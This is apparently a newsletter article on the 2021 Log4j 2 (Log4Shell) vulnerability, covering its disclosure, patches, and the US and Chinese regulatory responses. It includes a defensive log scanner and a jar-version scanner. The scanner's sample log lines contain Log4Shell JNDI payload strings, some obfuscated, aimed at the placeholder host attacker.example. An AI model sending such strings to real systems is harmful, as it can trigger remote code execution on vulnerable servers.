The open source software community and government agencies rush to contain a novel Log4j 2 vulnerability
On November 24, 2021, Chen Zhaojun (Chen) of the Alibaba Cloud Security Team alerted the Apache Software Foundation (ASF) about a Log4j 2 vulnerability that could allow knowledgeable threat actors to hijack computer systems running Log4j 2. Inside the Race to Fix a Potentially Disastrous Software Flaw (Bloomberg), available here.
Log4j 2 is a logging library (a prepackaged set of code that programmers reuse rather than write themselves) used to record events generated by the applications that include it. Log4j 2 is the successor of Log4j 1.x and offers enhanced features for programmers. Log4j 1.x reached end of life on August 5, 2015, making Log4j 2 the only supported version. Currently, this library is widely used in Java-based server and web applications.
To explain what Log4j 2 does, think about Event Data Recorders (EDRs) (commonly known as a “black box”), which are found on automobiles and airplanes. Vehicle manufacturers install third-party EDRs to delegate the task of recording data generated by the vehicle (for instance, speed and location). In the same way, program developers delegate program-logging features to third-party programming frameworks, such as Log4j 2. Log4j 2 is considered one of the most commonly used frameworks. Log4shell by the numbers- Why did CVE-2021-44228 set the Internet on Fire?, available here. In fact, it is even used by the Ingenuity helicopter on the Mars rover! Did you know that Ingenuity, the Mars 2020 Helicopter mission, is powered by Apache Log4j? (Twitter), original page deleted but the archived page available here.
The Log4j 2 vulnerability identified by Chen could allow a threat actor to send a carefully crafted message to a server running a susceptible Log4j 2 component and eventually install and run other programs on it without authorization. The mechanism is that Log4j 2 expands lookup expressions of the form ${...} found inside the text it logs; one of those lookups (jndi) causes the server to connect to a directory service named in the logged text, which an attacker can point at a server under their control to deliver code that the vulnerable application then executes. Because an attacker only needs to get a string such as an HTTP header, a username or a chat message into a log entry, this vulnerability bypasses other system security mechanisms and allows threat actors to control vulnerable systems remotely.
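The following is an added example, not code from the original article or from the Apache project, showing the practical side of the paragraph above: detection of the crafted lookup strings in web server logs. It assumes constructed access-log lines (the IP addresses and the host attacker.example are placeholders) and that, as Log4j 2 itself does, nested lookups are resolved from the inside out, which is how attackers hid the word "jndi" from naive pattern matching (for example ${${lower:j}ndi:...} or ${${::-j}ndi:...}). Only the lookup types commonly used for that obfuscation (lower, upper and the default-value syntax) are expanded; everything else is left untouched.

```python
import re

# Innermost ${...} lookup: a body containing no nested "${" and no "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Sentinels replace the delimiters of lookups we deliberately keep unresolved,
# so the expansion loop terminates instead of re-matching them forever.
_OPEN, _CLOSE = "\ue000", "\ue001"
# A resolved JNDI lookup with the URL schemes the Log4j 2 jndi lookup accepts.
_JNDI = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns|iiop|corba|nds|http)://", re.I)


def _resolve_inner(body: str) -> str:
    """Resolve one innermost lookup the way a vulnerable Log4j 2 would, for the
    lookup types attackers used to hide the string "jndi"."""
    if body.lower().startswith("jndi:"):
        return _OPEN + body + _CLOSE          # keep it: this is what we want to find
    if ":-" in body:
        # Default-value syntax "${name:-default}": both ${::-j} and ${env:NOPE:-j}
        # yield "j". (A real lookup of an existing variable would win; for
        # detection we conservatively take the default.)
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":
        return arg.lower()
    if sep and prefix.lower() == "upper":
        return arg.upper()
    return _OPEN + body + _CLOSE              # unknown lookup (date, ctx, ...): leave as is


def normalize_lookups(s: str, max_rounds: int = 64) -> str:
    """Expand nested lookups inside-out until nothing changes, then restore the
    delimiters of the lookups that were kept."""
    for _ in range(max_rounds):
        expanded = _INNER.sub(lambda m: _resolve_inner(m.group(1)), s)
        if expanded == s:
            break
        s = expanded
    return s.replace(_OPEN, "${").replace(_CLOSE, "}")


def scan_log_lines(lines):
    """Return (index, normalized_line) for every line that contains a JNDI
    lookup once de-obfuscated."""
    hits = []
    for i, line in enumerate(lines):
        if "${" not in line:                  # cheap pre-filter
            continue
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((i, norm))
    return hits


# Constructed sample access-log lines (user agent in the last field), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker.example/b}"',
    '203.0.113.7 - - "GET /${date:yyyy-MM-dd}/report HTTP/1.1" 404 "curl/7.79"',
]

if __name__ == "__main__":
    for index, normalized in scan_log_lines(SAMPLE_LOG):
        print(f"line {index}: {normalized}")
```

Running the block flags lines 1 to 3 and ignores the harmless ${date:...} on line 4. A matcher that only looks for the literal text "${jndi:" would miss lines 2 and 3, which is why normalizing before matching matters; it also means a negative result from a simple grep over logs is not evidence that no attempt was made.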
After verifying Chen’s claims, the ASF began creating a software fix to address the framework’s exposure. In the meantime, on December 8, 2021, Chen contacted the ASF again, this time alerting them that the Log4j 2 vulnerability was revealed on a Chinese blogging platform, and “[s]ome WeChat security chat groups are already discussing the details of the vulnerability, and some security researchers already have the vulnerability.” Inside the Race to Fix a Potentially Disastrous Software Flaw (Bloomberg), supra. Chen promised not to disclose the vulnerability until the ASF could publicly release an appropriate fix. Chen impressed on the ASF the need to “[p]lease hurry up.” Id.
Soon thereafter, the ASF published multiple software updates to resolve the vulnerability; the initial fix (Log4j 2.15.0) was itself found to be incomplete (tracked as CVE-2021-45046), and further releases followed. Log4j Zero-Day Vulnerability Response (Center for Internet Security), available here. The Center for Internet Security expects a continuous stream of fixes before this vulnerability is completely mitigated. Id.
According to Matthew Prince, co-founder and CEO of Cloudflare (a U.S.-based web infrastructure and security company), the earliest known instance of this vulnerability being exploited was on December 1, 2021. Matthew Prince’s Tweet (Twitter), available here. Similarly, a proof of concept for exploiting this vulnerability was posted as early as December 9, 2021. CVE-2021-44228(Apache Log4j Remote Code Execution), original page deleted but the archived page available here.
In response to the Log4j 2 vulnerability, the Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. Department of Homeland Security published its Log4j Scanner, which allows system administrators to determine whether their systems are potentially affected by the vulnerability. Log4j Scanner (GitHub), available here. Also, the National Institute of Standards and Technology (NIST) of the U.S. Department of Commerce has been continuously tracking the vulnerability via its National Vulnerability Database. CVE-2021-44228, available here. Finally, on January 4, 2022, the Federal Trade Commission (FTC) announced its intention “to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities.” FTC warns companies to remediate Log4j security vulnerability, available here. Under the Federal Trade Commission Act and the Gramm-Leach-Bliley Act, companies have legal obligations to take reasonable steps to mitigate known software vulnerabilities that can cause “loss or breach of personal information, financial loss, and other irreversible harms.” Id. In the past, the FTC has pursued companies, such as Equifax, for failing to reasonably secure sensitive consumer personal information. Equifax to Pay $575 Million as Part of Settlement with FTC, CFPB, and States Related to 2017 Data Breach, available here.
While CISA and several companies have released tools that check systems for the Log4j 2 vulnerability, these tools are not easy for non-technical users to operate. Because Log4j 2 is akin to an internal component of a complex machine, a consumer using a program built on the vulnerable Log4j 2 code cannot patch it by hand. Consumers should instead apply any software updates issued by developers, since those updates may fix issues stemming from the Log4j 2 vulnerability. Thus, it is up to software developers to determine whether their published programs are vulnerable to this exploit and to patch it promptly, before users’ systems are compromised.
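The check the paragraph above leaves to developers can be automated. The following is an added example, not the CISA scanner and not code from the original article, of the approach such tools take: walk a directory, open every jar/war/ear (including archives nested inside other archives, as in a deployed WAR), read the log4j-core version from the Maven metadata that ships in the jar, and check whether the JndiLookup class is still present, since removing that class was the ASF's documented mitigation for installations that could not upgrade. It assumes the standard Maven path META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties and the class path org/apache/logging/log4j/core/lookup/JndiLookup.class, both of which are real paths inside log4j-core. The sample archives it scans are constructed inline with placeholder bytes rather than real class files, and the version cut-off is deliberately the simple one for CVE-2021-44228 (2.15.0); a production scanner would also account for the 2.12.x and 2.3.x backport releases and the later follow-up CVEs.

```python
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIRST_FIXED = (2, 15, 0)          # first log4j-core release addressing CVE-2021-44228
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(pom_properties: str):
    """Pull 'version=2.14.1' (or '2.0-beta9') out of Maven pom.properties as an int tuple."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", pom_properties, re.M)
    return tuple(int(g or 0) for g in m.groups()) if m else None


def scan_archive(data: bytes, label: str, findings: list) -> list:
    """Inspect one archive given as bytes and recurse into archives nested inside it."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            version = parse_version(zf.read(POM_PROPERTIES).decode("utf-8", "replace"))
        has_jndi = JNDI_LOOKUP_CLASS in names
        if version is not None or has_jndi:
            findings.append({
                "archive": label,
                "version": version,
                "jndi_lookup_present": has_jndi,
                # Affected if the lookup class is still present and the version is
                # unknown (be conservative) or older than the first fixed release.
                "affected": has_jndi and (version is None or version < FIRST_FIXED),
            })
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(zf.read(name), f"{label}!{name}", findings)
    return findings


def scan_tree(root: str) -> list:
    """Scan every archive below root; labels are paths relative to root."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as f:
                    scan_archive(f.read(), os.path.relpath(path, root), findings)
    return sorted(findings, key=lambda f: f["archive"])


def build_constructed_samples(root: str) -> None:
    """Write three constructed archives (placeholder bytes, not real class files)."""
    props = "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=2.14.1\n"
    # 1. An unpatched log4j-core: old version, JndiLookup.class present.
    with zipfile.ZipFile(os.path.join(root, "log4j-core-2.14.1.jar"), "w") as zf:
        zf.writestr(POM_PROPERTIES, props)
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    # 2. Same version with the class removed (the documented mitigation).
    with zipfile.ZipFile(os.path.join(root, "log4j-core-2.14.1-mitigated.jar"), "w") as zf:
        zf.writestr(POM_PROPERTIES, props)
    # 3. A WAR bundling a patched log4j-core (the class still exists there, but the
    #    version is at or above the fix).
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(POM_PROPERTIES, props.replace("2.14.1", "2.17.1"))
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", inner.getvalue())


def demo() -> dict:
    """Build the samples in a temporary directory, scan them, return {archive: affected}."""
    with tempfile.TemporaryDirectory() as root:
        build_constructed_samples(root)
        return {f["archive"]: f["affected"] for f in scan_tree(root)}


if __name__ == "__main__":
    for archive, affected in demo().items():
        print(f"{'AFFECTED' if affected else 'ok      '} {archive}")
```

Two points the example makes that a version number alone does not: an archive reporting 2.14.1 is not affected if JndiLookup.class has been deleted from it, and a vulnerable copy can hide inside another archive (app.war!WEB-INF/lib/...), which is why a scanner that stops at the top-level file will miss real deployments.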
Although Chen is credited with, and widely praised for, discreetly revealing the vulnerability to the ASF, China’s Cyber Security Administration of the Ministry of Industry and Information Technology (MIIT) penalized Chen’s employer, Alibaba Cloud Computing (a China-based cloud computing service company), for failing to promptly report it to Chinese government authorities. 独家丨阿里云被暂停工信部网络安全威胁信息共享平台合作单位 [Exclusive: Alibaba Cloud suspended as a cooperating unit of the MIIT cybersecurity threat information sharing platform], available here. It is understood that under Article 2 of the Provision on Security Loopholes of Network Products (a cybersecurity governmental regulation of China), network product providers are obligated to report vulnerability information to the MIIT’s Cyber Security Threat and Vulnerability Information sharing platform within two days of discovery. 网络产品安全漏洞管理规定 [Regulations on the Management of Security Vulnerabilities in Network Products], available here. Although Chen reportedly knew of the Log4j 2 vulnerability as early as November 24, the MIIT was allegedly first notified of it by an unnamed network security professional organization on December 9, 2021. 关于阿帕奇Log4j2组件重大安全漏洞的网络安全风险提示 (中华人民共和国工业和信息化部) [Cybersecurity risk notice on a major security vulnerability in the Apache Log4j2 component (Ministry of Industry and Information Technology of the People's Republic of China)], available here. Consequently, Alibaba Cloud Computing’s cybersecurity partnership with the MIIT was suspended for six months.
Analysis
Despite providing useful event-logging features to programmers, Log4j 2 has historically suffered from vulnerabilities that allowed threat actors to execute unauthorized code on targeted servers. The common cause of these earlier vulnerabilities was Log4j’s willingness to accept data from external sources for logging purposes, in particular its socket server component, which deserialized whatever log events it received over the network. Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 28) (Palo Alto Networks – Unit 42), available here. By carefully crafting a malicious data stream and feeding it to a server using Log4j, security analysts were able to induce the library to behave in unexpected ways that could be exploited for infiltration purposes. See, e.g., CVE-2017-5645 (NIST), available here; CVE-2019-17571 (NIST), available here.
What sets the Log4j 2 vulnerability apart from other software vulnerabilities is the sheer breadth of this software component’s use. Researchers have identified a wide range of web services, including certain versions of the server software used to host the popular game Minecraft, as vulnerable to this exploit. See Log4jAttackSurface (GitHub), available here. The widespread implications of this vulnerability have led some to label the exploit a “cluster bomb of zero days.” CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE) (YouTube), available here. Fortunately, both CISA and NIST have provided up-to-date resources documenting this vulnerability for the cybersecurity community. Furthermore, the FTC’s announcement on Log4j 2 remediation requirements serves as an effective measure to encourage companies to investigate and mitigate this vulnerability. Also, the ASF has been active in providing Log4j 2 updates to mitigate the vulnerability.
Finally, Chen deserves much credit for withholding the information from everyone except those best placed to resolve the issue for all users. Public disclosure of a novel cybersecurity vulnerability without an appropriate remedy in place creates more opportunities for threat actors to exploit it before affected organizations can develop or apply a fix. Chen’s action demonstrates the goodwill and global cooperative nature of security professionals across national boundaries. It is likely that Chen acted on his own volition in handling his discovery for the sake of the global open source community. As a result, the potential damage from this vulnerability was substantially mitigated, even though Chen’s employer was reprimanded for violating China’s cybersecurity vulnerability disclosure regulation.
*This newsletter would especially like to recognize Zeyi Yang of Protocol, an online publication, for the thorough references to Chinese news sources and official legal references in his article. Beijing punishes Alibaba for not reporting Log4j loophole fast enough, supra.